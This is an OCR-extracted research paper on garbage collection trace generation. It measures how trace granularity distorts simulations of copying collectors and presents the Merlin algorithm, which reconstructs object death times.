null], [36455, 37914, null], [37914, 41358, null], [41358, 43921, null]], "google_gemma-3-12b-it_is_public_document": [[0, 492, true], [492, 3351, null], [3351, 7254, null], [7254, 10003, null], [10003, 14359, null], [14359, 18020, null], [18020, 20587, null], [20587, 23787, null], [23787, 26329, null], [26329, 29152, null], [29152, 31724, null], [31724, 34298, null], [34298, 36455, null], [36455, 37914, null], [37914, 41358, null], [41358, 43921, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 43921, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 43921, null]], "pdf_page_numbers": [[0, 492, 1], [492, 3351, 2], [3351, 7254, 3], [7254, 10003, 4], [10003, 14359, 5], [14359, 18020, 6], [18020, 20587, 7], [20587, 23787, 8], [23787, 26329, 9], [26329, 29152, 10], [29152, 31724, 11], [31724, 34298, 12], [34298, 36455, 13], [36455, 37914, 14], [37914, 41358, 15], [41358, 43921, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 43921, 0.0179]]}
olmocr_science_pdfs
2024-12-11
2024-12-11
ad791b4b5483eed2484485d004c3bb22a16715d4
Error-Free Garbage Collection Traces: How to Cheat and Not Get Caught Matthew Hertz† Kathryn S. McKinley‡ J Eliot B Moss† Stephen M Blackburn‡ Darko Stefanović§ † Dept. of Computer Science University of Massachusetts Amherst, MA 01003 {hertz,steveb,moss}@cs.umass.edu ‡ Dept. of Computer Science University of Texas at Austin Austin, TX, 78712 mckinley@cs.utexas.edu § Dept. of Computer Science University of New Mexico Albuquerque, NM 87131 darko@cs.unm.edu ABSTRACT Programmers are writing a large and rapidly growing number of programs in object-oriented languages such as Java that require garbage collection (GC). To explore the design and evaluation of GC algorithms quickly, researchers are using simulation based on traces of object allocation and lifetime behavior. The brute force method generates perfect traces using a whole-heap GC at every potential GC point in the program. Because this process is prohibitively expensive, researchers often use granulated traces by collecting only periodically, e.g., every 32K bytes of allocation. We extend the state of the art for simulating GC algorithms in two ways. First, we present a systematic methodology and results on the effects of trace granularity for a variety of copying GC algorithms. We show that trace granularity often distorts GC performance results compared with perfect traces, and that some GC algorithms are more sensitive to this effect than others. Second, we introduce and measure the performance of a new precise algorithm for generating GC traces which is over 800 times faster than the brute force method. Our algorithm, called Merlin, frequently timestamps objects and later uses the timestamps to reconstruct precisely when they died. It performs only periodic garbage collections and achieves high accuracy at low cost, eliminating any reason to use granulated traces. 1. INTRODUCTION While languages such as LISP and Smalltalk have always used garbage collection (GC), the dramatic increase of people writing programs in Java and other modern languages has seen a correspond- "This work is supported by NSF ITR grant CCR-0085792, NSF grant ACI-9982028, NSF grant EIA-9726401, DARPA grant 5-21425, DARPA grant F33615-01-C-1892 and IBM. Any opinions, findings, conclusions, or recommendations expressed in this material are the authors’ and do not necessarily reflect those of the sponsors. results. Section 6 then introduces our new trace generation algorithm and describes how it improves on the existing algorithm. Section 7 presents and analyzes results from the new tracing algorithm. Finally, Section 8 presents related studies and Section 9 summarizes this study. 2. BACKGROUND Three concepts are central for understanding this research: garbage collection, garbage collection traces, and garbage collection granularity. 2.1 Garbage Collection Garbage collection automates reclamation of objects that are not needed from within the heap. While a wide variety of systems use garbage collectors, we assume a system that uses an implicit-free environment to make our explanations simpler, i.e., an explicit new command allocates objects, but there is no free command. Instead, an object is removed from the heap during a GC when the collector determines that the object is no longer reachable. Since, without additional information, GCs cannot know which objects the program will use in the future, a garbage collector conservatively collects only objects it determines the program cannot reach and therefore cannot use now or in the future. To determine reachability, GCs begin at a program’s roots. The roots contain all the pointers from outside of the heap into the heap, such as the program stack and static variables. Any objects in the heap not in the transitive closure of these pointers are unreachable. Since once an object becomes unreachable it remains unreachable (and cannot be updated or used), these objects can be safely removed from the heap. In whole-heap collection, the collector determines the reachability of every object and removes all unreachable objects. Many collectors (e.g., generational collectors) often collect only part of the heap, limiting the work at each collection. Because the collector reclaims only unreachable objects, it must conservatively assume that the regions of the heap not examined contain only live objects. If objects in the unexamined region point to objects in the examined region, the target objects also remain in the heap. Since objects in the uncollected region are not even examined, collectors use write barriers to find pointers into the collected region. The write barriers are instrumentation invoked at every pointer store operation. A write barrier typically tests if the pointer target is in a region that will be collected before the region containing pointer source and records such pointers in some data structure. We assume that every pointer store is instrumented with a write barrier. In many systems this assumption is not true for root pointers, such as those in the stack. In this case, we enumerate the root pointers at each potential GC point, which is much less expensive than a whole-heap collection, and can be further optimized using the techniques of Cheng et al. [6]. 2.2 Copying Garbage Collection Algorithms We use four copying garbage collection algorithms for our evaluation: a semi-space collector, a fixed-nursery generational collector [15], a variable-sized nursery generational collector [3], and an Older-First collector [13]. We briefly describe each of these here for the reader who is unfamiliar with the GC literature. A semi-space collector (SS) allocates into From space using a bump pointer. When it runs out of space, it collects this entire region by finding all reachable objects and copying them into a second To space. The collector then reverses From and To space and continues allocating. Since all objects in From space may be live, it must reserve half the total heap for the To space, as do the generational collectors that generalize this collector. A fixed-nursery (FN) two generation collector divides the From space of the heap into a nursery and an older generation. It allocates into the nursery. When the nursery is full, it collects the nursery and copies the live objects into the older generation. It repeats this process until the older generation is also full. It then collects the nursery together with the older generation and copies survivors into the To space (the older generation). A variable-size nursery collector (VN) also divides the From space into a nursery and an older generation, but does not fix their boundary. In steady state, the nursery is some fraction of From space and when it fills up, VN copies live objects into the older fraction. The new nursery size is reduced by the size of the survivors. When the nursery gets too small, VN collects all of From space. The Older-First collector (OF) organizes the heap in order of object age. It collects a fixed size window that it slides through the heap from older to younger objects. In the steady state and when the heap is full, OF collects the window, returns the free space to the nursery, compacts the survivors, and then positions the window for the next collection over objects just younger than those that survived. If the window bumps into the allocation point, it resets the window to the oldest end of the heap. It need only reserve space the size of a window for a collection. 2.3 Garbage Collection Traces A garbage collection trace is a chronological recording of every object allocation, heap pointer update, and object death (object becoming unreachable) over the execution of a program. These events include all the information that a memory manager needs for its processing. Processing an object allocation requires an identifier for the new object and how much memory it needs; pointer update records include the object and field being updated and the new value; object death records define which object became unreachable. These events comprise the minimum amount of information that GC simulations need. Simulators use a single trace file to analyze any number of different GC algorithms and optimizations applied to a single program run. The trace contains all the information to which a garbage collector would actually have access in a live execution and all of the events upon which the collector may be required to act, independent of any specific GC implementation. Traces do not record all aspects of program execution. Thus, researchers can simulate a single implementation of a garbage collector with traces from any number of different languages. For these reasons, GC simulators are useful when prototyping and evaluating new ideas. Since (non-concurrent) garbage collection is deterministic, simulations can return exact results for a number of metrics. When accurate trace files are used as input, results from a GC simulator can be relied upon, making simulation attractive and accurate traces critical. Garbage collection trace generators must be integrated into the memory manager of the interpreter or virtual machine in which the program runs. If the program is compiled into a stand-alone executable, the compiler back end must generate code for trace gen- 1The obvious generalization to $n$ generations applies. 2While some optimizations and collectors may need additional information, it can be added to the trace file so that the majority of simulations do not need to process it. Since most GC algorithms use only this information, here we assume only this minimal information. eration instead of ordinary memory management code at each ob- ject allocation point and pointer update. The trace can log pointer updates by instrumenting pointer store operations; this instrumen- tation is particularly easy if the language and GC implementa- tion use write barriers, since it then simply instruments those write bar- rriers. A reachability analysis of the heap from the program’s root set determines object deaths. The common brute force method of trace generation determines reachability by performing a whole-heap gar- bage collection. Since the garbage collector marks and processes exactly the reachable objects, any objects unmarked (unprocessed) at the end of the collection must be unreachable and the trace gen- erator produces object death records for them. For a perfectly accurate trace, we must analyze the program at each point in the trace at which a garbage collection could be in- voked. For most GC algorithms, collection may be needed when- ever memory may need to be reclaimed: immediately before al- locating each new object, assuming only object allocation triggers GC. Thus, brute force trace generators have the expense of collect- ing the entire heap prior to allocating each object. If the simulated GC algorithms allow more frequent garbage collection invocations, the reachability analyses must be undertaken more often, as well. These frequent reachability analyses are also difficult because of the stress they place on the system and how they expose errors in the interpreter or virtual machine. 2.4 Garbage Collection Trace Granularity A common alternative to generating perfect traces is to perform the reachability analysis only periodically. Limiting the analysis to ev- ery \( N \) bytes of allocation makes the trace generation process faster and easier. It also causes the trace to be guaranteed accurate only at those specific points; the rest of the time it may over-estimate the set of live objects. Any simulation should assume that objects become unreachable only at the accurate points. The granularity of a trace is the period between these moments of accurate death knowledge. Although trace granularity is related to time, its most appropri- ate unit of measurement depends on how GC is triggered. Since most collectors perform garbage collection only when memory is exhausted, the most natural measure of granularity is the number of bytes allocated between accurate points in the trace. 3. EXPERIMENTAL DESIGN This section describes our methodology for evaluating experimen- tially the effect of trace granularity on simulating the four copying garbage collectors. We start by describing our simulator and pro- grams. We then describe how to deal with granularity in simulation. 3.1 Simulator Suite For our trace granularity experiments, we used gc-sim, a GC simu- lator suite from the University of Massachusetts with front-ends for Smalltalk and Java traces. In our simulator, we implemented four different garbage collection algorithms: SS, FN, VN, and OF, as de- scribed in Section 2.2. The first three collectors are in widespread use. For each collector, we simulated eight different \( \text{From} \) space sizes from 1.25 to 3 times the maximum size of the live objects within the heap, at .25 increments. For FN and VN we simulated each heap size with five different nursery sizes and for OF with five window sizes. These latter parameters ranged from \( \frac{1}{8} \) to \( \frac{5}{8} \) of \( \text{From} \) space, in \( \frac{1}{8} \) increments. 3.2 Granularity Schemes We designed and implemented four different schemes to handle trace granularity. Each of these schemes works independently of the simulated GC algorithm. They explore the limits of trace gran- ularity by affecting when the collections occur. Unsynced: When we began this research, our simulator used this naive approach to handling trace granularity: it did nothing; we call this method Unsynced. Unsynced simulations allow a GC to occur at any time in the trace; collections are simulated at the nat- ural collection points for the garbage collection algorithm (such as when the heap or nursery is full). This scheme allows the simulator to run the algorithm as it is designed and does not consider trace granularity when determining when to collect. Unsynced simul- ations may treat objects as reachable because the object death record was not reached in the trace, even though the object is unreachable. However, they allow a GC algorithm to perform collections at their natural points, unconstrained by the granularity of the input trace. SyncEarly: The first scheme we call SyncEarly. Figure 1(a) shows how SyncEarly decides when to collect. If, at a point with perfect knowledge, the simulator determines that the natural collection point will be reached within the following period equal to one gran- ule of the trace, SyncEarly forces a GC invocation. SyncEarly al- ways performs a collection \( at \ or \ before \) the natural point is reached. SyncEarly simulations may perform extra garbage collections, e.g., when the last natural collection point occurs between the end of the trace and what would be the next point with perfect knowledge. But, SyncEarly ensures that the simulated heap will never grow be- Yond the bounds it is given. SyncLate: The second scheme is SyncLate. Figure 1(b) shows how SyncLate decides when to collect. At a point with perfect knowledge, if SyncLate computes that the natural collection point occurred within the preceding time of one granule of the trace, SyncLate invokes a garbage collection. SyncLate collects \( at \ or \ after \) the natural point is reached. SyncLate simulations may GC too few times, e.g., when the last natural collection point occurs between the last point with perfect knowledge and the end of the trace. SyncLate allows the heap and/or nursery to grow beyond their nominal bounds between points with perfect knowledge, but enforces the bounds whenever a collection is completed. SyncMid: The last Synced scheme is SyncMid. Figure 1(c) shows how SyncMid decides when to collect. SyncMid forces a GC invo- cation at a point with perfect knowledge if a natural collection point is within half of the trace granularity in the past or future. SyncMid requires a collection at the point with perfect knowledge closest to the natural collection point. Doing this, SyncMid simulations try to balance the times they invoke collections too early and too late to achieve results close to the average. SyncMid simulations may, like SyncEarly, perform more or may, like SyncLate, perform fewer garbage collections. Between points with perfect knowledge, SyncMid simulations may also require the heap and/or nursery to grow beyond their nominal bounds. However, heap bounds are still enforced immediately following a collection. ![Diagram](image1) Figure 1: When each of the Sync schemes decides to collect. The triangles denote points in the trace with perfect knowledge. The natural collection point is shown as the solid line labeled N. The shaded region is as large as one granule of the trace and shows the region in which garbage collection is allowed. A GC is forced at the point in the trace with perfect knowledge within the shaded region, shown by the arrow labeled G. 4. TRACE GRANULARITY RESULTS In this section, we present our data analysis and results. 4.1 GC Simulation Metrics During a garbage collection simulation we measure a number of metrics: the number of collections invoked, the mark/cons ratio, the number of interesting stores, and the space-time product. Since the metrics we consider are deterministic, simulators can quite accurately return these results. The mark/cons ratio is the number of bytes that the collector copied divided by the number of bytes allocated. The ratio serves as a measure of the amount of work done by a copying collector. Higher mark/cons ratios suggest an algorithm will need more time, because it must process and copy more objects. Another metric we report is the number of interesting stores for a program run. Since many garbage collectors do not collect the entire heap, they use a write barrier to find pointers into the region currently collected (as we mentioned in Section 2.1). The write barrier instruments pointer store operations to determine if the pointer is one of which the garbage collector needs knowledge. The number of pointer stores, and the cost to instrument each of these, does not vary in a program run, but the number of pointer stores that must be remembered varies between GC algorithms at run time and will affect their performance. We also measure the space-time product. While this is not directly related to the time required by an algorithm, it measures another important resource: space. This metric is the sum the number of bytes used by objects within the heap at each allocation point multiplied by the size of the allocation (or the integral of the number of bytes used by objects within the heap with respect to time measured in bytes of allocation). Since the number of bytes allocated does not vary between different algorithms, this metric measures how well an algorithm manages the size of the heap throughout the program execution. None of these metrics is necessarily sufficient in itself to determine how well an algorithm performs. Algorithms can perform better in one or more of the metrics at the expense of another. The importance of considering the totality of the data can be seen in the models developed that combine the data to determine the total time each algorithm needs [13]. 4.2 GC Traces We used 15 GC traces in this study. Nine of the traces are from the Jalapeño JVM (now know as the Jikes RVM) [2, 1], a compiler and run-time system for Java in which we implemented our trace generator. The nine Java traces are: bloat-bloat (Bloat [11] using its own source code as input), two different configurations of Olden health (5 256 and 4 512), and SPEC compress, jess, raytrace, db, javac, and jack. We also have six GC traces from the University of Massachusetts Smalltalk Virtual Machine. The Smalltalk traces are: lambda-fact5, lambda-fact6, tocmcat, heapsim, tree-replace-random, and tree-replace-binary. More information about the traces appears in Table 1. We implemented a filter that takes perfect traces and a target value and outputs traces with the targeted level of granularity. We first generated perfectly accurate traces for each of the programs and then our filter generated 10 versions of each trace with granularity ranging from 1KB to 2048KB. Then our simulator used the perfect and granulated traces as input. 4.3 Analysis We began by simulating all combinations of program trace, trace granularity, granularity scheme, GC algorithm, and From space and nursery (window) size. We record the four metrics from above for each combination. Table 2 shows an example of the simulator output. With this large population of data (approximately 600 simulations for each GC/granularity scheme combination), we perform a detailed statistical analysis of the results. For this analysis, we remove any simulation that required fewer than 10 garbage collections. In simulations with few GCs, the addition or removal of a single collection can create dramatically different effects and furthermore the garbage collector would rarely make a difference in the program’s total running time. For these reasons, these results would rarely be included in an actual GC implementation study either. We also remove any simulation where the trace granularity equaled 50% or more of the simulated From space size, since trace granularity would obviously impact these results. We prune these cases, since the data will only bolster our claims that granularity is important. In addition, we only include simulations where both the perfect trace and the granulated trace completed. Occasionally, simulations of the granulated trace would complete merely because the simulator expanded the heap and delayed collection until an accurate point. There were also simulations of granulated traces that did not finish because garbage collection was invoked earlier than normal, causing too many objects to be promoted. Because any metrics generated from simulations that did not finish would be incomplete, we did not include them in our analysis. The number of experiments remaining at the 1KB granularity was about 90 for SS, 200 for VN, 250 for FN, and 425 for OF. The number of valid simulations does not vary more than by 2% or 3% until the 32KB granularity. At the 32KB granularity, there are 20% fewer simula- Table 1: Traces used in the experiment. Sizes are expressed in bytes. <table> <thead> <tr> <th>Program</th> <th>Description</th> </tr> </thead> <tbody> <tr> <td>bloat-bloat</td> <td>Bytecode-Level Optimization and Analysis Tool 98 using its own source code as input</td> </tr> <tr> <td>Olden Health (5 256)</td> <td>Columbian health market simulator from the Olden benchmark suite, recoded in Java</td> </tr> <tr> <td>SPEC 2001compress</td> <td>Compresses and decompresses 20MB of data using the Lempel-Ziv method. From SPECJVM98</td> </tr> <tr> <td>SPEC 2002jess</td> <td>Expert shell system using NASA CLIPS. From SPECJVM98.</td> </tr> <tr> <td>SPEC 2005raytrace</td> <td>Rayscenes a scene into a memory buffer. From SPECJVM98.</td> </tr> <tr> <td>SPEC 209jdb</td> <td>Performs series of database functions on a memory resident database. From SPECJVM98.</td> </tr> <tr> <td>SPEC 213javac</td> <td>Sun’s JDK 1.0.4 compiler. From SPECJVM98.</td> </tr> <tr> <td>SPEC 228jack</td> <td>Generates a parser for Java programs. From SPECJVM98.</td> </tr> <tr> <td>lambda-fact5</td> <td>Untyped lambda calculus interpreter evaluating 5! in the standard Church numerals encoding</td> </tr> <tr> <td>lambda-fact6</td> <td>Untyped lambda calculus interpreter evaluating 6! in the standard Church numerals encoding</td> </tr> <tr> <td>tomcatv</td> <td>Vectorized mesh generator</td> </tr> <tr> <td>heapsim</td> <td>Garbage collected heap simulator</td> </tr> <tr> <td>tree-replace-random</td> <td>Builds a binary tree then replaces random subtrees at a fixed height with newly built subtrees</td> </tr> <tr> <td>tree-replace-binary</td> <td>Builds a binary tree then replaces random subtrees with newly built subtrees</td> </tr> </tbody> </table> Table 2: Simulator output from a fixed-sized nursery simulation of Health (4, 512). The top lines are the metrics after six collections, when the differences first become obvious; the bottom lines are the final results of the simulation. <table> <thead> <tr> <th>Program</th> <th>Max. Alloc</th> <th>Total Alloc</th> </tr> </thead> <tbody> <tr> <td>bloat-bloat</td> <td>1 644 117</td> <td>1 644 117</td> </tr> <tr> <td>Olden Health</td> <td>2 337 284</td> <td>2 337 284</td> </tr> <tr> <td>SPEC 2001compress</td> <td>8 144 188</td> <td>8 144 188</td> </tr> <tr> <td>SPEC 2002jess</td> <td>3 792 856</td> <td>3 792 856</td> </tr> <tr> <td>SPEC 2005raytrace</td> <td>5 733 464</td> <td>5 733 464</td> </tr> <tr> <td>SPEC 209jdb</td> <td>10 047 216</td> <td>10 047 216</td> </tr> <tr> <td>SPEC 213javac</td> <td>11 742 640</td> <td>11 742 640</td> </tr> <tr> <td>SPEC 228jack</td> <td>3 813 624</td> <td>3 813 624</td> </tr> <tr> <td>lambda-fact5</td> <td>4 500 700</td> <td>4 500 700</td> </tr> <tr> <td>lambda-fact6</td> <td>7 253 640</td> <td>7 253 640</td> </tr> <tr> <td>tomcatv</td> <td>126 096</td> <td>126 096</td> </tr> <tr> <td>heapsim</td> <td>549 504</td> <td>549 504</td> </tr> <tr> <td>tree-replace-random</td> <td>49 052</td> <td>49 052</td> </tr> <tr> <td>tree-replace-binary</td> <td>39 148</td> <td>39 148</td> </tr> </tbody> </table> 5. TRACE GRANULARITY DISCUSSION The data in Table 3 are quite revealing about the effects of trace granularity and the usefulness of the different schemes in handling granulated traces. From these data it is clear that the use of granulated traces distorts GC performance results, compared with perfect traces. For a majority of the metrics, a granularity of only one kilobyte is enough to cause this distortion! Clearly, trace granularity significantly affects the simulator results. 5.1 Unsynchronized Results Unsynchronized collections dramatically distort the simulation results. In Table 3, two collectors (SS and OF) have statistically significant differences for every metric at the 1KB granularity. In both cases, the granulated traces copied more bytes, needed more GCs, and used more space. For both collectors the differences were actually significant at the 99.9% confidence level or higher (p < 0.001), meaning we would expect similar results in 999 out of 1000 experiments. The generational collectors did not fare much better. Both collectors saw granulated traces producing significantly higher mark/cons ratios than the perfect traces. As one would expect, these distortions grew with the trace granularity. In Unsynchronized simulations, collections may come at inaccurate points in the trace; the garbage collector must process and copy objects that are reachable only because the trace has not reached the next set of death records. Once copied, these objects increase the space-time prod- 5.2 Synced Results Synced simulations tend to require slightly higher granularities than Unsynced before producing significant distortions. However, every Synced scheme significantly distorts the results for each metric for at least one collector. Examining the results from Table 3 and Table 4, reveals a few patterns. Considering all the traces, SyncEarly and SyncLate still produce differences from simulations using perfect traces, but slightly larger trace granularities may be required before the differences become statistically significant. SyncMid has several cases where significant distortions do not appear, but this result is both collector- and metric-dependent. In addition, there are still statistically significant distortions at traces with granularities as small as 1KB. In Table 4, when considering only traces with larger maximum live sizes, Synced simulations provide better estimates of the results from simulating perfect traces. But, there still exist significant differences at fairly small granularities. Because Synced simulations affect only when the collections occur, they do not copy unreachable objects merely because the object deletion record has not been reached. Instead, adjusting the collection point causes other problems. Objects that are allocated and those whose death records should occur between the natural collection point and the Synced collection point are initially affected. Depending on the Synced scheme, these objects may be removed from the heap or processed and copied earlier than in a simulation using perfect traces. Once the heap is in error (containing too many or too few objects), it is possible for the differences to be compounded as the Synced simulation may collect at points even further away (and make different collection decisions) than the simulation using perfect traces. Just as with Unsynced simulations, small initial differences can snowball. SyncEarly: SyncEarly simulations tend to decrease the space-time products and increase the number of GCs, interesting stores, and mark/cons ratios versus simulations using perfect traces. At smaller granularities, FN produces higher space-time products. Normally, FN copies objects from the nursery because they have not had time to die before collection. SyncEarly exacerbates this situation, collecting even earlier and copying more objects into the older generation than similar simulations using perfect traces. As trace granularity grows, however, this result disappears (the simulations still show significant distortions, but in the expected direction) because the number of points in the trace with perfect knowledge limits the number of possible GCs. SyncLate: In a similar, but opposite manner, SyncLate simulations tend to decrease the mark/cons ratio and number of collections. As trace granularity increases, these distortions become more pronounced as the number of potential collection points begins to limit the collectors as well. Not every collector produces the same distortion on the same metric, however. FN produces significantly higher mark/cons ratios and more garbage collections at small granularities. While SyncLate simulations allow it to copy fewer objects early on, copying fewer objects causes the collector to delay whole-heap collections. The whole-heap collections remove unreachable objects from the older generation and prevent them from forcing the copying of other unreachable objects in the nursery. The collector eventually promotes more and more unreachable objects, so that it often must perform whole-heap collections soon after nurs- <table> <thead> <tr> <th>Metric</th> <th>Unsynced</th> <th>SyncLate</th> <th>SyncEarly</th> <th>SyncMid</th> </tr> </thead> <tbody> <tr> <td>Mark/Cons</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> </tr> <tr> <td>Space-Time</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> </tr> <tr> <td>Num. of GCs</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> </tr> <tr> <td>Int. Stores</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> <td>SS 1 FN 1 VN 1</td> </tr> </tbody> </table> Table 3: Earliest granularity (in KB) at which each metric becomes significantly different, by simulation method and collector. Differences were tested using a two-tailed t-test at the 95% confidence level (p = 0.05). every collection, boosting both the mark/cons ratio and the number of GCs. **SyncMid**: The best results we found are for SyncMid. From Table 4, the larger from space sizes produce similar results for SyncMid simulations and simulations using perfect traces at even large granularities. The design of SyncMid tries to balance the times that it collects too early with those times it collects too late. As a result, it tends to balance collections distorting the results in one direction and collections distorting results in the other. While this is a benefit, it also makes the effects of trace granularity hard to predict. Both SyncEarly and SyncLate showed collector-dependent behavior. While we showed that it would not be sound to base conclusions for a new or unknown collector from their results, one could make an assumption about their effect on the metrics. SyncMid simulations, by comparison, produced biases that were dependent upon both the metric and collector. When significant differences occur, it is not clear in which way the metric will be skewed. While the results were very good on the whole, there is still not a single metric for which every collector returned results without statistically significant distortions. ### 5.3 Trace Granularity Conclusion From the above, it is clear that trace granularity has a significant impact on the simulated results of garbage collection algorithms. When using traces to compare and measure new GC algorithms and optimizations, there is not a clear way to use granulated traces and have confidence that the results are valid. ### 6. MERLIN TRACE GENERATION *Life can only be understood backwards; but it must be lived forwards.* —Søren Kierkegaard In this section we present our new Merlin Trace Generation Algorithm, which generates perfect traces up to 800 times faster than the dominant brute force method of trace generation. Given the speed with which it can generate perfect traces, the Merlin algorithm removes the need to use granulated traces and avoids the issues that their use can cause. The Merlin algorithm has other advantages over brute force trace generation. As discussed in Section 2.4, implementing the latter algorithm is difficult. For brute force to work, all GC and GC-affecting code must be completely error-free and the system must support whole-heap garbage collection. Our new trace generator can work with almost any garbage collection algorithm and stresses the system less. According to Arthurian legend, the wizard Merlin began life as an old man. He then lived backwards in time, dying at the time of his birth. Merlin’s knowledge of the present was based on what he had already experienced in the future. The Merlin tracing algorithm works in a similar manner. Because it computes when each object died backwards in time, the first time the Merlin trace generation algorithm encounters an object in this calculation is the time of the object’s death; any other possible death times would be earlier in the running of the program (but later in Merlin’s processing), and need not be considered. Merlin, both the mythical character and our trace generator, works in reverse chronological order so that each decision, once made, never has to be revisited. This remainder of this section overviews how Merlin computes when objects transition from reachable to unreachable, then gives a detailed explanation of why Merlin works, and discusses implementation issues. The method of finding object allocations and pointer updates is similar to the above description, but we describe how this works with the Merlin algorithm. #### 6.1 Merlin Algorithm Overview The Merlin algorithm improves upon brute force trace generation by computing when objects were last reachable rather than when objects become unreachable. Knowing the last moment that an object was reachable, the death time for an object can be easily determined: since time advances in discrete steps, the death time of an object is the time interval immediately following the one in which the object was last reachable. By computing the last time objects are reachable, Merlin needs to perform only occasional garbage collections, saving substantial work. To find when objects are last reachable, we stamp objects with the current time whenever they may transition from reachable to unreachable — whenever objects may lose an incoming reference. If the object later loses another incoming reference (because the earlier update did not leave it unreachable), then Merlin will simply overwrite the previous timestamp with the current time. Now suppose that the system runs, performing occasional garbage collections. Consider the situation immediately following one of these GCs. The collector determines which objects are unreachable and which may still be live. For tracing purposes, we need to compute exactly when the unreachable objects were last reachable. The timestamps can be used to compute these times. Consider a dead object with the latest timestamp. The object must have been last reachable at that time, for if it were reachable later, it would have been pointed to by an object with an even later timestamp — but this is the latest time. Now consider the pointers in the dead object with the latest death time. Any objects that are the target of these pointers would have also been reachable at the time stamped into the original object. Thus we propagate the last reachable time from the first object to the objects to which it points. In fact, we should propagate this last reachable time from a dead object to the objects to which it points until we can propagate it no further. To prevent infinite propagation through cycles, the algorithm simply stops if an object was last reachable at a time equal to or later than the last reachable time of the source object. Once this processing is completed for the object with the latest timestamp, we have found the objects that were last reachable at that time. We can then remove them from the set of dead objects and consider the latest timestamp among the remaining objects. The last reachable time arguments apply iteratively, so we can determine this time for every object that the GC found was unreachable. #### 6.2 Merlin Details and Implementation While the previous section provides an overview of Merlin, this section presents a detailed discussion of why the Merlin algorithm works and discusses implementation issues. As discussed in Section 2.3, finding which objects are dead requires a reachability analysis. Our new algorithm cannot change this requirement, but instead improves upon the previous brute force method in computing the last instant that an object was reachable. To compute when objects were last reachable, the Merlin algorithm does a small amount of work as the program runs and when the trace must be accurate, and then performs less frequent GCs during trace generation. After the system invokes a GC, the Merlin algorithm works backward in time to find exactly when each object the garbage collector found was unreachable was last reachable. In brute force trace generation, a death record is appended to the trace when an ob- reachable times. The following paragraphs consider the different references (reference counting) is not sufficient to determine last interred by a write barrier. Objects may be reachable until a pointer interacted with the final time it loses an incoming reference. If the last in- strumented by a pointer update. Objects A and B in Figure 2 are examples of this case. 1. An object transitions from one to zero incoming references via a pointer update. Objects A and B in Figure 2 are examples of this case. 2. An object transitions from n to n - 1 incoming references via a pointer update, where all n - 1 references are from unreachable objects. An example of this case is object C in Figure 2. 3. An object’s number of incoming references does not change, but all the reachable objects pointing to it become unreachable. The objects labeled D, E, and F in Figure 2 are examples of this case. Table 5: How objects become unreachable <table> <thead> <tr> <th>Number of incoming references</th> <th>How objects become unreachable</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Objects A and B in Figure 2 are examples of this case.</td> </tr> <tr> <td>n</td> <td>Objects C in Figure 2.</td> </tr> <tr> <td>n - 1</td> <td>Objects D, E, and F in Figure 2 are examples of this case.</td> </tr> <tr> <td>0</td> <td>No object is reachable.</td> </tr> </tbody> </table> Figure 2: Objects A and B are reachable until their last incoming reference is removed. Object C is last reachable when an incoming reference is removed, even though it has others. Objects D, E, and F are reachable until an action that does not affect their incoming references. 6.2.1 How Objects Become Unreachable To understand how the Merlin algorithm works backward in time to compute when an object was last reachable, it is important to understand how objects become unreachable. Table 5 is a series of generalizations about how objects within the heap transition from reachable to unreachable. Scenarios 1 and 2 of this table describe an object that is reachable until an action involves the object; Scenario 3 describes an object that is last reachable without it being directly involved in an action. Clearly, not all pointer stores are the last time an object is reachable, but any object that does become unreachable because of a pointer store must be in the transitive closure set of the object that lost an incoming reference. 6.2.2 Finding Potential Last Reachable Times Knowing how objects transition from reachable to unreachable and using the concept of time, is now possible to find objects’ last reachable time. Since it is not always clear if a pointer store is the last time an object is reachable (if a pointer update leaves an object with no incoming references, it is clear the pointer update is the last time the object is reachable; if an update leaves the object with n remaining incoming references, it is not clear if the object continues to be reachable), just counting the number of incoming references (reference counting) is not sufficient to determine last reachable times. The following paragraphs consider the different methods by which objects transition from reachable to unreachable and present the Merlin pseudo-code to compute these last reachable times. Instrumented Pointer Stores: Most pointer stores will be instrumented by a write barrier. Objects may be reachable until a pointer store, caught by a write barrier, removes an incoming reference. The Merlin trace generator stamps the object losing an incoming reference (the old target of the pointer) with the current time. Since time increases monotonically, each object will ultimately be stamped with the final time it loses an incoming reference. If the last in- coming reference is removed by an instrumented pointer store, the Merlin code shown in Figure 4 stamps the object with the last time it was reachable. Uninstrumented Pointer Stores: Root pointers may not have their pointer stores instrumented. An object that is reachable until a root pointer update may not have the time it transitions from reachable to unreachable detected by any instrumentation. Just as a normal GC begins with a root scan, our trace generator performs a modified root scan when the trace must be accurate. This modified root scan also enumerates the root pointers, but merely stamps the root-referenced objects with the current time. While root-referenced, objects are always stamped with the current time; if an object was reachable until a root pointer update, the timestamp will hold the last time the object was reachable. Figure 5 shows Merlin’s pseudo-code executed whenever the root scan enumerates a pointer. Referring Objects Become Unreachable: We also compute the time an object was last reachable for objects unreachable only because the object(s) pointing to them are unreachable (Scenario 3 of Table 5). For chains of these objects, updating the last reachable time for one object requires recomputing the last reachable times of objects to which it points. We simplify this 